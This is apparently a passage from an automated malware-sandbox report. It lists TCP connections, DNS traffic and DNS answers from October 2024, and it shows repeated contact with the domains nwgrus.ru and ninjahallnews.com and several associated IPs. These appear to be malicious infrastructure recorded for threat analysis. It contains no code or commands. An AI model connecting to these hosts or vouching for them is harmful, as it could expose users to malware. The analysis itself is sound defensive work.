                                                                                                      Oct 8, 2024 00:21:00.349776983 CEST49994443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.349787951 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.349811077 CEST49994443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.351675034 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.351682901 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.351706982 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.351737022 CEST49994443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.351742029 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.351754904 CEST49994443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.361929893 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.361939907 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.362013102 CEST49994443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.362020016 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.375576019 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.375585079 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.375644922 CEST49994443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.375653028 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.375670910 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.375715971 CEST49994443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.375720024 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.375741005 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.375773907 CEST49994443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.375936031 CEST49994443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.375953913 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.375967979 CEST49994443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.375972986 CEST4434999423.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.465542078 CEST50001443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.465591908 CEST4435000123.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:00.465668917 CEST50001443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.466152906 CEST50001443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:00.466166973 CEST4435000123.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:01.240084887 CEST4435000123.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:01.240205050 CEST50001443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:01.241421938 CEST50001443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:01.241435051 CEST4435000123.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:01.241674900 CEST4435000123.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:01.242376089 CEST50001443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:01.242403984 CEST50001443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:01.242408991 CEST4435000123.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:01.521480083 CEST4435000123.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:01.521563053 CEST4435000123.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:01.521677017 CEST50001443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:01.521855116 CEST50001443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:01.521874905 CEST4435000123.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:01.521889925 CEST50001443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:01.521895885 CEST4435000123.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:01.569442034 CEST50007443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:01.569477081 CEST4435000723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:01.569715977 CEST50007443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:01.570621014 CEST50007443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:01.570636034 CEST4435000723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:02.142400026 CEST4435000723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:02.142685890 CEST50007443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:02.149297953 CEST50007443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:02.149305105 CEST4435000723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:02.149553061 CEST4435000723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:02.152293921 CEST50007443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:02.152332067 CEST50007443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:02.152335882 CEST4435000723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:02.425405025 CEST4435000723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:02.425457001 CEST4435000723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:02.425590992 CEST50007443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:02.425590992 CEST50007443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:02.425590992 CEST50007443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:02.468700886 CEST50013443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:02.468751907 CEST4435001323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:02.468811035 CEST50013443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:02.469364882 CEST50013443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:02.469381094 CEST4435001323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:02.733652115 CEST50007443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:02.733680010 CEST4435000723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:03.061547995 CEST4435001323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:03.061625004 CEST50013443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:03.072930098 CEST50013443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:03.072945118 CEST4435001323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:03.073285103 CEST4435001323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:03.074080944 CEST50013443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:03.074107885 CEST50013443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:03.074115038 CEST4435001323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:03.346070051 CEST4435001323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:03.346133947 CEST4435001323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:03.346189022 CEST50013443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:03.346225023 CEST50013443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:03.346242905 CEST4435001323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:03.346255064 CEST50013443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:03.346261024 CEST4435001323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:09.219770908 CEST50050443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:09.219865084 CEST4435005023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:09.220000982 CEST50050443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:09.223309040 CEST50050443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:09.223323107 CEST4435005023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:10.763479948 CEST4435005023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:10.763556004 CEST50050443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:10.785818100 CEST50050443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:10.785856009 CEST4435005023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:10.786115885 CEST4435005023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:10.842226028 CEST50050443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:11.009738922 CEST50050443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:11.009815931 CEST50050443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:11.009887934 CEST4435005023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:11.376568079 CEST4435005023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:11.376642942 CEST4435005023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:11.377470970 CEST50050443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:11.384138107 CEST50050443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:11.384138107 CEST50050443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:21:11.384182930 CEST4435005023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:11.384210110 CEST4435005023.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:21:32.493266106 CEST5005780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:32.499903917 CEST8050057109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:32.499972105 CEST5005780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:32.500380039 CEST5005780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:32.500399113 CEST5005780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:32.506397009 CEST8050057109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:32.507457018 CEST8050057109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:33.566517115 CEST8050057109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:33.567200899 CEST8050057109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:33.567261934 CEST5005780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:33.567306042 CEST5005780192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:33.572274923 CEST8050057109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:34.413707972 CEST5005880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:34.418792009 CEST8050058109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:34.418885946 CEST5005880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:34.419028044 CEST5005880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:34.419050932 CEST5005880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:34.423819065 CEST8050058109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:34.424030066 CEST8050058109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:35.197633028 CEST8050058109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:35.197896004 CEST8050058109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:35.197943926 CEST5005880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:35.197983980 CEST5005880192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:35.202824116 CEST8050058109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:36.959933996 CEST5005980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:36.966422081 CEST8050059109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:36.966501951 CEST5005980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:36.966672897 CEST5005980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:36.966702938 CEST5005980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:36.973114014 CEST8050059109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:36.974662066 CEST8050059109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:37.723088026 CEST8050059109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:37.723496914 CEST8050059109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:37.723611116 CEST5005980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:37.723700047 CEST5005980192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:37.728559017 CEST8050059109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:38.989212990 CEST5006080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:38.994251966 CEST8050060109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:38.994314909 CEST5006080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:38.994489908 CEST5006080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:38.994489908 CEST5006080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:38.999910116 CEST8050060109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:38.999989033 CEST8050060109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:39.804027081 CEST8050060109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:39.805140018 CEST8050060109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:39.805320024 CEST5006080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:39.805421114 CEST5006080192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:39.812751055 CEST8050060109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:51.591862917 CEST5006180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:51.598803997 CEST8050061109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:51.598872900 CEST5006180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:51.599035978 CEST5006180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:51.599056005 CEST5006180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:51.606118917 CEST8050061109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:51.608006954 CEST8050061109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:52.354597092 CEST8050061109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:52.355051994 CEST8050061109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:21:52.355257034 CEST5006180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:52.356561899 CEST5006180192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:21:52.363363981 CEST8050061109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:07.694593906 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:07.699466944 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:07.699584961 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:07.699738979 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:07.699768066 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:07.704714060 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:07.704726934 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:08.471247911 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:08.472786903 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:08.472860098 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:08.472944975 CEST5006280192.168.2.4109.175.29.39
                                                                                                      Oct 8, 2024 00:22:08.478990078 CEST8050062109.175.29.39192.168.2.4
                                                                                                      Oct 8, 2024 00:22:26.981128931 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:26.981177092 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:26.981710911 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:26.981712103 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:26.981750965 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.552356958 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.552483082 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.553685904 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.553694010 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.553940058 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.582811117 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.582858086 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.583077908 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.911839008 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.911931992 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.912015915 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.912128925 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.912151098 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:27.912240982 CEST50063443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:27.912245989 CEST4435006323.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:28.574995041 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:28.579853058 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:28.579948902 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:28.580086946 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:28.580101013 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:28.584973097 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:28.584996939 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:30.172260046 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:30.172914982 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:30.172981977 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:30.174947977 CEST5006480192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:30.181123018 CEST8050064211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.156351089 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.156460047 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.156564951 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.156943083 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.156980038 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.725234985 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.725334883 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.726571083 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.726594925 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.726866007 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:49.728025913 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.728060961 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:49.728121996 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:50.083858013 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:50.084044933 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:50.084129095 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:50.084191084 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:50.084228992 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:50.084255934 CEST50065443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:22:50.084270954 CEST4435006523.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:22:51.264605999 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:51.269917011 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:51.270133972 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:51.271368027 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:51.271368027 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:51.276216030 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:51.276231050 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:52.888025045 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:52.888273954 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:22:52.888319969 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:52.888880968 CEST5006680192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:22:52.895714045 CEST8050066211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:13.661993980 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:13.662033081 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:13.662115097 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:13.662417889 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:13.662422895 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.224329948 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.224401951 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.225620985 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.225625992 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.225884914 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.226563931 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.226592064 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.226624012 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.580030918 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.580107927 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.580163956 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.580327988 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.580343962 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:14.580355883 CEST50067443192.168.2.423.145.40.168
                                                                                                      Oct 8, 2024 00:23:14.580360889 CEST4435006723.145.40.168192.168.2.4
                                                                                                      Oct 8, 2024 00:23:16.750488997 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:16.756223917 CEST8050068211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:16.756345987 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:16.756416082 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:16.756416082 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:16.762480021 CEST8050068211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:16.763006926 CEST8050068211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:20.287751913 CEST8050068211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:20.288213968 CEST8050068211.171.233.129192.168.2.4
                                                                                                      Oct 8, 2024 00:23:20.288275003 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:20.288321972 CEST5006880192.168.2.4211.171.233.129
                                                                                                      Oct 8, 2024 00:23:20.296267033 CEST8050068211.171.233.129192.168.2.4

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 8, 2024 00:19:53.624926090 CEST5137353192.168.2.41.1.1.1
                                                                                                      Oct 8, 2024 00:19:54.639575005 CEST5137353192.168.2.41.1.1.1
                                                                                                      Oct 8, 2024 00:19:55.656968117 CEST5137353192.168.2.41.1.1.1
                                                                                                      Oct 8, 2024 00:19:55.727994919 CEST53513731.1.1.1192.168.2.4
                                                                                                      Oct 8, 2024 00:19:55.728008986 CEST53513731.1.1.1192.168.2.4
                                                                                                      Oct 8, 2024 00:19:55.728013039 CEST53513731.1.1.1192.168.2.4
                                                                                                      Oct 8, 2024 00:20:41.741137028 CEST5406053192.168.2.41.1.1.1
                                                                                                      Oct 8, 2024 00:20:41.782227993 CEST53540601.1.1.1192.168.2.4
                                                                                                      Oct 8, 2024 00:22:28.020339012 CEST6088653192.168.2.41.1.1.1
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST53608861.1.1.1192.168.2.4

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Oct 8, 2024 00:19:53.624926090 CEST192.168.2.41.1.1.10x7a5eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:54.639575005 CEST192.168.2.41.1.1.10x7a5eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.656968117 CEST192.168.2.41.1.1.10x7a5eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:20:41.741137028 CEST192.168.2.41.1.1.10x1e50Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.020339012 CEST192.168.2.41.1.1.10x478bStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Oct 8, 2024 00:19:48.535267115 CEST1.1.1.1192.168.2.40xc1fcNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:48.535267115 CEST1.1.1.1192.168.2.40xc1fcNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.727994919 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.727994919 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.727994919 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.727994919 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru220.125.3.190A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.727994919 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.727994919 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.727994919 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
